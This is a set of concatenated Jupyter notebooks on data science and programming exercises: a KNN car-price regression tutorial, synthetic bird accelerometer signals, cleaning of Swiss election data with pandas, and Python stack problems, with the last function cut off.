If we compare the data type of each column to its contents, several opportunities for data cleaning can be seen. For example, the "normalized-losses" feature is listed as an object-type column because it contains both strings and numbers. However, the strings in the column are question marks (?). Rather than being categories, these may be placeholders for missing data. This problem applies to several other columns, not just this one.Furthermore, in some columns like "num-of-doors", numbers are written as words. For example, 2 is written as "two". Since the numbers are in string format, these cannot be used in the K Nearest Neighbors model.Thus, in summary, the following cleaning steps have to be performed:- Replace question mark strings ("?") with null values (NaN). These are the proper way to indicate missing values.- Convert several object columns, like "normalized-losses", into numeric columns.- Replace numbers written as words with their proper numeric equivalents. For example, replace "four" with 4.These were performed in the following code cell.
###Code
#collapse-hide
# Clean the data.
# Replace ? with NaN since these are placeholders.
cars_df = cars_df.replace("?", np.nan)
# Change this object column to float type.
obj_to_numeric = [
"normalized-losses",
"bore",
"stroke",
"horsepower",
"peak-rpm",
"price",
]
for col in obj_to_numeric:
cars_df[col] = pd.to_numeric(cars_df[col], errors = "coerce")
# Replace strings with numeric equivalents.
cars_df["num-of-doors"] = cars_df["num-of-doors"].replace(
{
"four": 4.0,
"two": 2.0,
}
)
cars_df["num-of-cylinders"] = cars_df["num-of-cylinders"].replace(
{
"four": 4,
"six": 6,
"five": 5,
"eight": 8,
"two": 2,
"three": 3,
"twelve": 12,
}
)
cars_df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 205 entries, 0 to 204
Data columns (total 26 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 symboling 205 non-null int64
1 normalized-losses 164 non-null float64
2 make 205 non-null object
3 fuel-type 205 non-null object
4 aspiration 205 non-null object
5 num-of-doors 203 non-null float64
6 body-style 205 non-null object
7 drive-wheels 205 non-null object
8 engine-location 205 non-null object
9 wheel-base 205 non-null float64
10 length 205 non-null float64
11 width 205 non-null float64
12 height 205 non-null float64
13 curb-weight 205 non-null int64
14 engine-type 205 non-null object
15 num-of-cylinders 205 non-null int64
16 engine-size 205 non-null int64
17 fuel-system 205 non-null object
18 bore 201 non-null float64
19 stroke 201 non-null float64
20 compression-ratio 205 non-null float64
21 horsepower 203 non-null float64
22 peak-rpm 203 non-null float64
23 city-mpg 205 non-null int64
24 highway-mpg 205 non-null int64
25 price 201 non-null float64
dtypes: float64(12), int64(6), object(8)
memory usage: 41.8+ KB
###Markdown
The new summary of columns is shown above. Several columns which were once "object" columns are now numeric. Also, since we replaced "?" placeholders with null values, we can now see that some columns have missing values.
###Code
#collapse-hide
null_percs = (
cars_df
.isnull()
.sum()
.divide(cars_df.shape[0])
.multiply(100)
)
null_percs.loc[null_percs > 0]
###Output
_____no_output_____
###Markdown
The table above shows the percentage of missing values in each column that has them. In particular, "normalized-losses" has missing values in 20% of the observations. Thus, we will have to drop this column from the dataset. This is better than the alternative, which is to delete all rows where "normalized-losses" is missing.As for the other 6 columns, we will use listwise deletion. This means that we will drop all rows with missing values in any of those columns.
###Code
#collapse-hide
cars_df = (
cars_df
.drop("normalized-losses", axis = 1)
.dropna(
subset = [
"num-of-doors",
"bore",
"stroke",
"horsepower",
"peak-rpm",
"price",
]
)
)
num_null = cars_df.isnull().sum().sum()
print(f"Total number of missing values: {num_null}")
print(f"New shape of dataset: {cars_df.shape}")
###Output
Total number of missing values: 0
New shape of dataset: (193, 25)
###Markdown
Now, there are no more missing values in the dataset. There are 193 rows and 25 columns left. The K Nearest Neighbors AlgorithmNext, I will discuss the theory behind the KNN algorithm, then implement it on the dataset.First, let us discuss basic terminology. For your reference, below is a small part of the dataset:
###Code
#collapse-hide
cars_df.loc[:5, ["make", "fuel-type", "num-of-doors", "body-style", "price"]]
###Output
_____no_output_____
###Markdown
Each row of data is called an observation; in this case, each observation is a car.On the other hand, each column is either a feature or a target. The target is the variable that we try to predict, and the features are information used to make the prediction. In the case of this project, the features may include the size of the car, the number of doors, etc. The target is the price of the car.The set of cars whose prices we will predict is called the testing set. On the other hand, the training set is the set of cars used to train the model to make predictions. Put more simply, in order to predict the price of a car in the testing set, we must compare it to the cars in the training set.In order to compare cars, KNN uses the Euclidean distance as a similarity metric between two observations. A low distance close to 0 means that the observations are very similar to each other. The following formula is used:$d = \sqrt{\sum_{i=1}^n (q_i - p_i)^2}$- $d$ is the Euclidean distance.- $n$ is the number of features.- $q$ and $p$ each refer to a different observation in the data. In this case, each is a different car. - $q_i$ is the value of feature $i$ for observation $q$. For example, if feature $1$ is the number of doors, $q_1$ is the number of doors on car $q$.- The differences between the two observations' features are squared, then summed up. Finally, the square root of the sum gives the Euclidean distance.Given that we want to predict the price of a car $q$, KNN computes the Euclidean distance of $q$ from *every single car in the training set*. The cars most similar to $q$ are its "nearest neighbors."We then choose a number $k$, which will determine how many of the nearest neighbors will be selected. For example, if $k = 5$, we select the five most similar cars. Then, we take the mean price of these five cars, and we predict that this is the price of car $q$.Since we make a prediction based on an observation's $k$ nearest neighbors, the algorithm is called K Nearest Neighbors. Note that what I have described is an example of a KNN regression model, as it predicts a numeric target. There are still several other forms of KNN. Some use a different similarity metric like Manhattan distance, and some perform classification, which means that they predict a categorical target (Miller, 2019). Techniques for ImplementationUnlike with my previous [post](https://miguelahg.github.io/mahg-data-science/python/pandas/numpy/matplotlib/scikit-learn/2021/12/14/Naive-Bayes-Algorithm-Detecting-Spam-Messages.html) on the Naive Bayes Algorithm, I will not be programming this algorithm manually. Instead, I will use the scikit-learn workflow, which involves pre-packaged machine learning functions.In this part, I will individually discuss certain important techniques used in the machine learning workflow. In the next part, I will combine these techniques in order to obtain the optimal KNN model. StandardizationThe first important technique is standardization. So that each feature will contribute equally to the Euclidean distance, we will standardize each numeric feature. In other words, each value will be converted into a z-score so that the mean of each feature is 0 and its standard deviation is 1. The following equation is used:$z = \frac{x - \bar{x}}{s}$- $z$ is the z-score.- $x$ is a value in a feature.- $\bar{x}$ is the mean of the feature.- $s$ is the sample standard deviation.
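Before turning to scikit-learn, here is a toy sketch (made-up numbers, not part of the actual pipeline) that ties the two formulas above together: standardize the features, compute Euclidean distances, and average the prices of the k nearest cars.
###Code
# Toy illustration of KNN regression with two made-up features (curb weight, horsepower)
toy_features = np.array([[2100.0, 110.0],
                         [2300.0, 120.0],
                         [3800.0, 250.0],
                         [2900.0, 160.0]])
toy_prices = np.array([9000.0, 10500.0, 32000.0, 16000.0])
query_car = np.array([2200.0, 115.0])  # the car whose price we want to predict

# Standardize each feature using the training statistics (z-scores)
means = toy_features.mean(axis=0)
stds = toy_features.std(axis=0, ddof=1)
toy_z = (toy_features - means) / stds
query_z = (query_car - means) / stds

# Euclidean distance from the query car to every training car
distances = np.sqrt(((toy_z - query_z) ** 2).sum(axis=1))

# Prediction: mean price of the k most similar cars
k = 2
nearest = np.argsort(distances)[:k]
print("Predicted price:", toy_prices[nearest].mean())
###Output
_____no_output_____
###Markdown
 Returning to the first technique, the cell below standardizes every numeric feature of the car dataset as described above.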
###Code
#collapse-hide
all_feature_cols = [col for col in cars_df.columns if col != "price"]
# Series of feature:data type
fdt = cars_df[all_feature_cols].dtypes
# Identify numeric features
all_numeric_features = fdt.index[fdt != "object"]
# Standardize
cars_df[all_numeric_features] = cars_df[all_numeric_features].apply(zscore, axis = 0, ddof = 1)
cars_df[all_numeric_features].head()
###Output
_____no_output_____
###Markdown
The table above shows the first 5 rows of all of the numeric features. Notice that each feature now contains positive and negative values close to 0 because it was standardized. Feature SelectionThe second technique is feature selection. We must choose features which we think are most relevant to a car's price. We can only select numeric features since categorical ones cannot be used to calculate Euclidean distance. Thus, we must select from the following features:
###Code
#collapse-hide
all_numeric_features.to_list()
###Output
_____no_output_____
###Markdown
All of these features are physical characteristics of a car, except for "symboling". According to the dataset documentation by Schlimmer (2019), this feature is an "insurance risk rating." It elaborates:> Cars are initially assigned a risk factor symbol associated with its price. Then, if it is more risky (or less), this symbol is adjusted by moving it up (or down) the scale. Actuarians call this process "symboling". A value of +3 indicates that the auto is risky, -3 that it is probably pretty safe. Given that this feature is systematically associated with the price of a car, it may be relevant to our model. Thus, we will consider it along with the other numeric features.In order to determine which combination of features is the best, we will use univariate feature selection. "Univariate" refers to the use of a single variable. We will perform a statistical test between each feature and the target. Then, we will select the features with the highest scores from the statistical test (scikit-learn developers, 2021).In our case, we have a regression problem, since we want to predict a continuous variable, car price. Thus, we will use the F-statistic as our score function. According to Frost (2017), the F-statistic indicates the "overall significance" of a linear regression model. In univariate feature selection, we would do the following steps:- For each feature: - Perform linear regression where the independent variable is the feature and the dependent variable is the target (in this case, price). - Obtain the F-statistic.- Compile a list with the F-statistic of each feature.- Identify the features with the highest F-statistics.This can be implemented automatically using the scikit-learn's `SelectKBest` class. It is called `SelectKBest` because we can set a parameter `k` which tells how many features to select. For example, if `k = 3`, the top three features with the highest F-statistic are selected. This is done below:
###Code
#collapse-hide
skb = SelectKBest(
score_func = f_regression,
k = 3,
)
X = cars_df[all_numeric_features]
y = cars_df["price"]
X_new = skb.fit_transform(X, y)
best_features = list(skb.get_feature_names_out())
print("Top 3 features:", best_features)
###Output
Top 3 features: ['curb-weight', 'engine-size', 'horsepower']
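###Markdown
 For reference, the F-statistic computed for every candidate feature (not just the selected three) can be inspected through the fitted selector's `scores_` attribute; a quick sketch:
###Code
# F-statistics for all numeric features, highest first
feature_scores = pd.Series(skb.scores_, index=all_numeric_features)
print(feature_scores.sort_values(ascending=False))
###Output
_____no_output_____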
###Markdown
The results show that curb weight, engine size, and horsepower are the highest-scoring features. However, we will not select these yet for the final model, since other steps still must be discussed. Train-Test Split with StratificationTrain-test split is the third important technique.Before model training, the dataset has to be split into training and testing sets. We will use 80% of the data in the training set and 20% in the testing set. As the names suggest, the training set is used to train the model or help it *learn* how to predict car prices. Then, we make predictions on the cars on the testing set to see whether the predictions are accurate.Before we split the data, though, we have to ensure that the frequency distribution of the target is similar between the training and testing sets. Below is a histogram of the frequency distribution of car price across the entire dataset:
###Code
#collapse-hide
sns.histplot(cars_df["price"], bins = 100)
plt.title("Frequency Distribution of Car Price")
plt.xlabel("Price (USD)")
plt.ylabel("Number of Cars")
plt.show()
###Output
_____no_output_____
###Markdown
The graph shows a right-skewed distribution, which means that most of the car prices are low and there are outliers with high prices. When we split the data into training and testing sets, we want each set to have a similar distribution to this.De Cock (2011) provides a helpful suggestion on how to do this. The article says, "Simply order the original data set by a variable of interest (such as sale price) and select every kth observation to achieve the desired sample size (k=2 for a 50/50 split or k=4 for a 75/25 split)."In our case, we want an 80/20 split. One-fifth of the data will go to the testing set, so we can use k = 5. We will thus order the observations by price, then assign every 5th observation to the testing set. All other observations will go to the training set.In the code below, I have written a custom function `stratify_continuous` that uses this technique. I then performed a train-test split after stratification. `X_train` and `y_train` refer to the features and target in the training set, respectively. `X_test` and `y_test` are from the testing set.
###Code
#collapse-hide
def stratify_continuous(n_folds, y):
"""Stratify a dataset on a continuous target."""
if n_folds < 2 or n_folds > 10:
raise ValueError("Please select a number of folds from 2 to 10.")
fold_nums = list(range(n_folds))
# DataFrame where "index" column contains the original indices
df = pd.DataFrame(
y
# Shuffle before ranking so that cars with the same price are ordered randomly.
.sample(frac = 1, random_state = 1, ignore_index = False)
)
# This column gives a rank to each value in y. 0 is the rank of the lowest value.
# Ties are broken according to order of appearance.
df["rank"] = df[y.name].rank(method = "first") - 1
df["fold"] = 0
for f in fold_nums[1:]:
# start at f, then increment by n_folds
indices = list(range(f, df.shape[0], n_folds))
df.loc[df["rank"].isin(indices), "fold"] = f
# Revert df to original order of indices
df = df.reindex(index = y.index)
# A series that indicates the fold number of each observation according to its original position in y
fold_series = df["fold"].copy()
return fold_series
folds = stratify_continuous(
n_folds = 5,
y = cars_df["price"],
)
def split_folds(X, y, fold_series, test_fold):
"""Take a dataset whose observations have been grouped into folds,
then perform a train-test split."""
if fold_series.dtype != "int64":
raise AttributeError("The fold list does not purely contain integers.")
test_mask = (fold_series == test_fold)
X_train = X.loc[~test_mask].copy()
y_train = y.loc[~test_mask].copy()
X_test = X.loc[test_mask].copy()
y_test = y.loc[test_mask].copy()
return X_train, X_test, y_train, y_test
X_train, X_test, y_train, y_test = split_folds(
X = cars_df[all_numeric_features],
y = cars_df["price"],
fold_series = folds,
test_fold = 4,
)
# Summary statistics for target columns.
target_df = pd.concat(
[y_train, y_test],
axis = 1,
join = "outer",
)
target_df.columns = ["y_train price", "y_test price"]
target_df.describe()
###Output
_____no_output_____
###Markdown
This table shows summary statistics for the price columns of the two sets. The sets have similar means at around USD 13,200, and they also have similar medians at around USD 10,200.Let us compare the price distributions using KDE plots:
###Code
#collapse-hide
sns.kdeplot(y_train, label = "Training set")
sns.kdeplot(y_test, label = "Testing set")
plt.title("Comparison of Car Prices Between Sets")
plt.xlabel("Price (USD)")
plt.ylabel("Probability Density")
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
The KDE plots both seem to follow the same shape and have the same center. This shows that the training and testing sets have roughly the same distribution of car prices. Thus, these were stratified correctly. Hyperparameter OptimizationThe fourth technique is hyperparameter optimization. This involves training the KNN model using different hyperparameter values to see which one performs the best.A hyperparameter is a value that influences the behavior of a model and has no relation to the data. In the case of KNN, one important hyperparameter is the $k$ value, or the number of neighbors used to make a prediction. If $k = 5$, we take the mean price of the top five most similar cars and call this our prediction. However, if $k = 10$, we take the top ten cars, so the mean price may be different.We can optimize $k$ in this way:- Decide values of $k$ to test.- For each $k$ value, fit and evaluate a KNN model.- Identify the best-performing model and use its $k$ value in the final model.In order to evaluate a model, we need an evaluation metric. In our case, we will use the Root Mean Squared Error or RMSE. This is calculated with the following equation:$RMSE = \sqrt{\frac{1}{n} \sum_{i=1}^n (\text{actual}_i - \text{predicted}_i)^2}$- $n$ is the sample size.- $\text{actual}$ is the actual target value, or in this case, the actual price of a car.- $\text{predicted}$ is the predicted target value.RMSE can be interpreted as the average error of a regression model. For example, if $RMSE = 1000$, this means that the model's predicted car prices are USD 1000 away from the actual car prices, on average.Below is an example of hyperparameter optimization using RMSE. All of the numeric features were used for this example.
###Code
#collapse-hide
k_values = [1, 3, 5]
k_rmse = pd.Series(dtype = "float64")
for k in k_values:
knn = KNeighborsRegressor(
n_neighbors = k,
algorithm = "auto",
)
knn.fit(X_train, y_train)
y_pred = knn.predict(X_test)
rmse = np.sqrt(mean_squared_error(y_test, y_pred))
k_rmse.loc[k] = rmse
print("k value and RMSE")
k_rmse
###Output
k value and RMSE
###Markdown
The table above shows that RMSE was lowest for $k = 3$. The RMSE was about USD 3146, which means that on average, the predicted prices are USD 3146 away from the actual prices. K-Fold Cross-Validation The last technique that will be discussed is K-Fold Cross-Validation. Earlier, we split the data into one training set and one testing set. The K-Fold Cross-Validation allows us to obtain a more holistic view of model performance by rotating the observations used in the two sets. In the words of Brownlee (2018), it estimates "how the model is expected to perform in general when used to make predictions on data not used during the training of the model."Here, $k$ has a different meaning. It determines the number of splits to make in a dataset. For example, if $k = 5$, the dataset will be split into 5 folds, each set containing 20% of the total data.In summary, the following steps are performed:- Split the data into 5 folds: A, B, C, D, E.- Use fold A as the testing set and use the others as the training set.- Fit and evaluate a KNN model, thus obtaining RMSE.- Repeat the above process for a total of 5 times, so that each fold is used as a testing set once.- Compile a list of the five RMSE values obtained.- Compute the mean RMSE value. This is the final metric of model performance.K-Fold Cross-Validation can be implemented using scikit-learn's `KFold` and `cross_val_score` . An example of 5-fold cross-validation is shown below.
###Code
#collapse-hide
knn = KNeighborsRegressor(
n_neighbors = 5,
algorithm = "auto",
)
kf = KFold(5, shuffle = True, random_state = 1)
mses = cross_val_score(
estimator = knn,
X = cars_df[all_numeric_features],
y = cars_df["price"],
scoring = "neg_mean_squared_error",
cv = kf,
)
mses = pd.Series(mses)
rmses = mses.abs().pow(1/2)
mean_rmse = rmses.mean()
sd_rmse = rmses.std(ddof = 1)
print(f"""Regular 5-fold cross-validation
Mean RMSE: {mean_rmse:.2f}
Standard Deviation RMSE: {sd_rmse:.2f}
RMSE Values: {rmses.to_list()}""")
###Output
Regular 5-fold cross-validation
Mean RMSE: 3722.28
Standard Deviation RMSE: 565.62
RMSE Values: [3407.8275635020186, 3902.1144860913682, 3009.7340988268425, 4521.314079941105, 3770.3892479494248]
###Markdown
The mean RMSE above presents a better picture of the model's performance because it takes into account different possible combinations of training and testing sets.Note, however, that the standard deviation of the RMSE was around 566. This means that the RMSE values varied by several hundreds of dollars from model to model during the cross-validation. In simpler terms, the model performance was inconsistent. It performed much better when trained on some folds than when it was trained on other folds.Thus, we can take k-fold cross-validation a step further by stratifying the folds so that they will have similar price distributions. This will ensure that each fold is representative of the full sample. Thus, I have written a custom function in the code cell below to do this.
###Code
#collapse-hide
def stratified_kfcv(X, y, fold_series, regression_model):
"""Conduct k-fold cross-validation on a stratified dataset."""
fold_nums = fold_series.unique()
mse_lst = []
for f in fold_nums:
X_train, X_test, y_train, y_test = split_folds(
X = X,
y = y,
test_fold = f,
fold_series = fold_series,
)
regression_model.fit(X_train, y_train)
y_pred = regression_model.predict(X_test)
mse = mean_squared_error(y_test, y_pred)
mse_lst.append(mse)
return mse_lst
knn = KNeighborsRegressor(
n_neighbors = 5,
algorithm = "auto",
)
mse_lst = stratified_kfcv(
X = cars_df[all_numeric_features],
y = cars_df["price"],
fold_series = folds,
regression_model = knn,
)
mse_series = pd.Series(mse_lst)
rmse_series = mse_series.pow(1/2)
mean_rmse = rmse_series.mean()
sd_rmse = rmse_series.std(ddof = 1)
print(f"""Stratified 5-fold cross-validation
Mean RMSE: {mean_rmse:.2f}
Standard Deviation RMSE: {sd_rmse:.2f}
RMSE Values: {rmse_series.to_list()}""")
###Output
Stratified 5-fold cross-validation
Mean RMSE: 3369.44
Standard Deviation RMSE: 387.33
RMSE Values: [3193.0727214096655, 2883.515369146238, 3844.6421242541865, 3674.5947449327227, 3251.39247707809]
###Markdown
The mean RMSE from stratified CV was USD 3369. This is about USD 400 lower than the result of the regular CV, USD 3722.Furthermore, the SD RMSE is equal to 387, which is lower than the previous value of 566. Therefore, the five models trained during cross-validation performed more similarly to each other.Thus, we can see that stratifying observations before k-fold cross-validation can be more effective at approximating the true performance of the model compared to regular k-fold cross-validation. Combining TechniquesIn this part, we will combine all of the discussed techniques to optimize the KNN model.The steps are as follows:- Use the standardized features that were calculated earlier.- For each number `n_features` from 1 to 10: - Perform univariate feature selection using the F-statistic. - Identify the best `n_features` features. - For each number `k` from 1 to 20: - Evaluate the model using stratified 5-fold cross-validation. - For each fold, train a `k` nearest neighbors model using the best features. - Obtain the mean RMSE value.- Compile a list of all mean RMSE values obtained.- Identify the model with the lowest mean RMSE. This is the final model.This is implemented in the code below.
###Code
#collapse-hide
n_feature_list = list(range(1, 11))
result_lst = []
for n_features in n_feature_list:
# Univariate feature selection
skb = SelectKBest(
score_func = f_regression,
k = n_features,
)
X = cars_df[all_numeric_features]
y = cars_df["price"]
X_new = skb.fit_transform(X, y)
# List of "best" features
best_features = list(skb.get_feature_names_out())
k_values = list(range(1, 21))
for k in k_values:
# stratified 5-fold cross validation
knn = KNeighborsRegressor(
# Use a different k value each time
n_neighbors = k,
algorithm = "auto",
)
mse_lst = stratified_kfcv(
X = cars_df[best_features],
y = cars_df["price"],
fold_series = folds,
regression_model = knn,
)
mse_series = pd.Series(mse_lst)
rmse_series = mse_series.pow(1/2)
mean_rmse = rmse_series.mean()
sd_rmse = rmse_series.std(ddof = 1)
new_row = (n_features, best_features, k, mean_rmse, sd_rmse)
result_lst.append(new_row)
result_df = pd.DataFrame(result_lst)
result_df.columns = ["Number of Features", "Best Features", "k Neighbors", "Mean RMSE", "SD RMSE"]
result_df = (
result_df
.sort_values(["Mean RMSE", "SD RMSE"], ascending = True)
.reset_index(drop = True)
)
###Output
_____no_output_____
###Markdown
Before we discuss the top-performing models, let us look at the general trends in the results using some graphs.
###Code
#collapse-hide
sns.lineplot(
data = result_df,
x = "k Neighbors",
y = "Mean RMSE",
hue = "Number of Features",
)
plt.title("Mean RMSE against k Neighbors")
plt.show()
###Output
_____no_output_____
###Markdown
The graph above shows that in general, no matter the number of features, the mean RMSE increased as the number of neighbors (k) increased. Therefore, it is best to have a low k value so that the model makes predictions only using a few cars that are most similar to the car being tested.Next, let us look at a graph with the same variables, except that the number of features is now on the x-axis instead of k.
###Code
#collapse-hide
sns.lineplot(
data = result_df,
x = "Number of Features",
y = "Mean RMSE",
hue = "k Neighbors",
)
plt.title("Mean RMSE against Number of Features")
plt.show()
###Output
_____no_output_____
###Markdown
We can see that for models with a high k value (represented by the darker lines), the mean RMSE increased slightly as the number of features increased.However, for models with a low k value (represented by the lighter pink lines), the mean RMSE stayed the same or even decreased when the number of features increased.Therefore, the best model would be one with a low k value and a medium-to-high number of features.In order to determine this more precisely, let us look at the top 10 models with the lowest RMSE.
###Code
#collapse-hide
result_df.head(10)
###Output
_____no_output_____ |
bird_flapping.ipynb | ###Markdown
As a researcher of bird behavior I am tracking birds with accelerometers using the https://uva-bits.nl system. To study the birds' energy usage I want to create a machine learning model. To train this model I need some artificial data. Real data set The file https://github.com/NLeSC/eEcology-Annotation-UI/raw/master/demo/tracker.json was derived from the uva-bits database of tracker 355 on 2010-06-28.
###Code
import json
import urllib.request
import pandas as pd
with urllib.request.urlopen('https://github.com/NLeSC/eEcology-Annotation-UI/raw/master/demo/tracker.json') as f:
data = json.load(f)
frame = 34
df = pd.DataFrame({
'x': data[frame]['x_acceleration'],
'y': data[frame]['y_acceleration'],
'z': data[frame]['z_acceleration']},
index=data[frame]['time_acceleration']
)
df.info()
df.plot()
###Output
<class 'pandas.core.frame.DataFrame'>
Float64Index: 40 entries, 0.0 to 1.95
Data columns (total 3 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 x 40 non-null float64
1 y 40 non-null float64
2 z 40 non-null float64
dtypes: float64(3)
memory usage: 1.2 KB
###Markdown
Let us recreate this with sequgen
###Code
import numpy as np
from sequgen.deterministic.sine import sine
from sequgen.deterministic.constant import constant
t_predict = np.linspace(0, 2, 40) # 2 seconds of 20Hz
x = sine(t_predict, wavelength=2/6, amplitude=0.25, phase_shift=0.25) + \
sine(t_predict, wavelength=2/6, amplitude=0.1, phase_shift=0.1) + \
constant(t_predict, -0.2)
z = sine(t_predict,
wavelength=2/6, # 6 flaps in 2 seconds
amplitude=1,
phase_shift=0.05) + constant(t_predict, 1) # add Earths gravity
y = sine(t_predict, wavelength=2/6, amplitude=0.25, phase_shift=0.05) + \
sine(t_predict, wavelength=2/6, amplitude=0.1, phase_shift=0.2)
pd.DataFrame({'x':x, 'y':y, 'z': z}, index=t_predict).plot()
###Output
_____no_output_____ |
09 Pandas Teil 2/dataprojects/wahlen/Clean.ipynb | ###Markdown
Cleaning the data This is how we get from the BFS cube to a clean data file **Source:**- Election results from the BFS: the data is available from the BFS: https://www.pxweb.bfs.admin.ch/pxweb/de/px-x-1702020000_105/px-x-1702020000_105/px-x-1702020000_105.px Preparation As an exception, we import a few more libraries than usual...
###Code
import pandas as pd
import numpy as np
###Output
_____no_output_____
###Markdown
Loading the data This is going to be a bit of a marathon...- We first navigate to the BFS "cube": https://www.pxweb.bfs.admin.ch/pxweb/de/px-x-1702020000_105/px-x-1702020000_105/px-x-1702020000_105.px **1st attempt:** We download the data in CSV form. (It is already in the folder `dataprojects/wahlen/`)
###Code
path = 'px-x-1702020000_105.csv'
#df = pd.read_csv(path)
###Output
_____no_output_____
###Markdown
Can we maybe manage this with a text editor?? Problems:- Encoding- Does not start on line 1- Delimiter Help for the `read_csv()` function: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html Help on encodings is available here: - https://docs.python.org/3/library/codecs.html#standard-encodings ... but which encoding?? Trick: use shell code with `!`
###Code
!file -I {path}
df = pd.read_csv(path, delimiter=';', skiprows=2, encoding='latin_1')
df.head(5)
###Output
_____no_output_____
###Markdown
That looks pretty... but:- the municipality names carry ugly leading characters- the important municipality numbers are missing! **2nd attempt:** We try it with Excel
###Code
path = 'px-x-1702020000_105.xlsx'
df = pd.read_excel(path)
df.head(10)
###Output
_____no_output_____
###Markdown
... that does not look very encouraging either!!
###Code
df = pd.read_excel(path, skiprows=2)
df.head(5)
###Output
_____no_output_____
###Markdown
- We have to invent column names...
###Code
columns = ['Gemeinde_ID', 'Gemeinde_Name', 'Jahr', 'Jahr2', 'Partei_ID', 'Partei_Name', 'Partei_Anteil']
df = pd.read_excel(path, skiprows=2, names=columns)
df.head(10)
###Output
_____no_output_____
###Markdown
... but what about all the NaNs?? We need to display more rows...
###Code
df.head(100)
###Output
_____no_output_____
###Markdown
We need EVEN MORE ROWS! How do we do that? https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.set_option.html
###Code
pd.set_option("display.max_rows", 100)
df.head(100)
###Output
_____no_output_____
###Markdown
We have to fill in the missing fields! Pandas has a VERY HANDY FUNCTION for this: `ffill()`
###Code
df = df.ffill()
df.head(100)
###Output
_____no_output_____
###Markdown
To be safe, let's also take a look at the end:
###Code
df.tail(100)
###Output
_____no_output_____
###Markdown
Uh oh... there is still some garbage at the end! We can get rid of it with a simple trick:
###Code
df = df[0:115632]
df
###Output
_____no_output_____
###Markdown
**But...**... before we finally start the analysis, we have to invest a little more work. Cleaning the data We have to replace the three dots with NaN
###Code
df['Partei_Anteil'] = df['Partei_Anteil'].replace('...', np.nan)
df
###Output
_____no_output_____
###Markdown
- What exactly is the second year column for??? Let's get rid of it.
###Code
df = df.drop(columns=['Jahr2'])
df
###Output
_____no_output_____
###Markdown
- Districts? We don't want those! (The `.str[]` operator is handy here)
###Code
df['Gemeinde_Name'].str[0:2] == '>>'
df = df.drop(index=df[df['Gemeinde_Name'].str[0:2] == '>>'].index)
df
###Output
_____no_output_____
###Markdown
- The dots in front of the municipality names... can go as well
###Code
df['Gemeinde_Name'] = df['Gemeinde_Name'].str.replace('......', '', regex=False)
df.head()
###Output
_____no_output_____
###Markdown
- Gemeinde_ID, Jahr and Partei_ID are integers
###Code
df['Gemeinde_ID'] = df['Gemeinde_ID'].astype(int)
df['Jahr'] = df['Jahr'].astype(int)
df['Partei_ID'] = df['Partei_ID'].astype(int)
df.head()
df
###Output
_____no_output_____
###Markdown
Nooow we are done and can begin the analysis. We export the file. Modifying the structure
###Code
df2 = pd.pivot_table(df, index=['Gemeinde_ID', 'Gemeinde_Name', 'Partei_Name'], columns='Jahr', values='Partei_Anteil')
df2
df2 = df2.reset_index()
df2
###Output
_____no_output_____
###Markdown
Export
###Code
df2.to_csv("Wahlergebnisse 1999 und 2019 in Gemeinden.csv", index=False)
###Output
_____no_output_____ |
Coding-Ninjas-Data-Structure-and-Algorithm-in-Python-main/Stack/All codes in one.ipynb | ###Markdown
Code : Stack Using LL
###Code
from sys import stdin
class Node :
def __init__(self, data) :
self.data = data
self.next = None
class Stack :
def __init__(self) :
self.__head = None
self.__size = 0
def getSize(self) :
return self.__size
def isEmpty(self) :
return self.__size == 0
def push(self, data) :
newNode = Node(data)
if self.__head is None :
self.__head = newNode
else :
newNode.next = self.__head
self.__head= newNode
self.__size += 1
def pop(self) :
if self.__head is None :
return -1
ans = self.__head.data
self.__head = self.__head.next
self.__size -= 1
return ans
def top(self) :
if self.__head is None :
return -1
return self.__head.data
#main
q = int(stdin.readline().strip())
stack = Stack()
while q > 0 :
inputs = stdin.readline().strip().split(" ")
choice = int(inputs[0])
if choice == 1 :
data = int(inputs[1])
stack.push(data)
elif choice == 2 :
print(stack.pop())
elif choice == 3 :
print(stack.top())
elif choice == 4 :
print(stack.getSize())
else :
if stack.isEmpty() :
print("true")
else :
print("false")
q -= 1
###Output
_____no_output_____
###Markdown
Balanced Parentheses
###Code
from sys import stdin
def isEmpty(stack) :
return len(stack) == 0
def isBalanced(expression) :
stack = list()
for i in range(len(expression)) :
if expression[i] == '(' :
stack.append(expression[i])
elif expression[i] == ')' :
if isEmpty(stack) :
return False
topChar = stack.pop();
if expression[i] == ')' and topChar == '(' :
continue
else :
return False
return isEmpty(stack);
#main
expression = stdin.readline().strip()
if isBalanced(expression) :
print("true")
else :
print("false")
###Output
_____no_output_____
###Markdown
Reverse Stack
###Code
from sys import stdin, setrecursionlimit
setrecursionlimit(10 ** 6)
def reverseStack(inputStack, extraStack) :
if len(inputStack) == 0:
return;
lastElement = inputStack.pop()
reverseStack(inputStack, extraStack);
while not isEmpty(inputStack) :
top = inputStack.pop()
extraStack.append(top)
inputStack.append(lastElement)
while not isEmpty(extraStack) :
top = extraStack.pop()
inputStack.append(top)
'''-------------- Utility Functions --------------'''
#Takes a list as a stack and returns whether the stack is empty or not
def isEmpty(stack) :
return len(stack) == 0
#Taking input using fast I/o method
def takeInput() :
size = int(stdin.readline().strip())
inputStack = list()
if size == 0 :
return inputStack
values = list(map(int, stdin.readline().strip().split(" ")))
inputStack = values
return inputStack
#main
inputStack = takeInput()
emptyStack = list()
reverseStack(inputStack, emptyStack)
while not isEmpty(inputStack) :
print(inputStack.pop(), end = " ")
###Output
_____no_output_____
###Markdown
Check redundant brackets
###Code
from sys import stdin
def checkRedundantBrackets(expression) :
stk = list()
for i in range(len(expression)) :
if (expression[i] == '(') or (find(expression[i])) :
stk.append(expression[i])
elif expression[i] == ')' :
hasOperator = False
while not isEmpty(stk) and top(stk) != '(' :
stk.pop()
hasOperator = True
if not hasOperator :
return True
if not isEmpty(stk) :
stk.pop()
return False
'''-------------- Utility Functions --------------'''
def find(ch) :
if ch == '+' or ch == '-' or ch == '*' or ch == '/' :
return True
return False
#Takes a list as a stack and returns whether the stack is empty or not
def isEmpty(stack) :
return len(stack) == 0
#Takes a list as a stack and returns the element at the top
def top(stack) :
#assuming the stack is never empty
return stack[len(stack) - 1]
#main
expression = stdin.readline().strip()
if checkRedundantBrackets(expression) :
print("true")
else :
print("false")
###Output
_____no_output_____
###Markdown
Stock Span
###Code
from sys import stdin
def stockSpan(price, n) :
stk = list()
output = [-1] * n
stk.append(0)
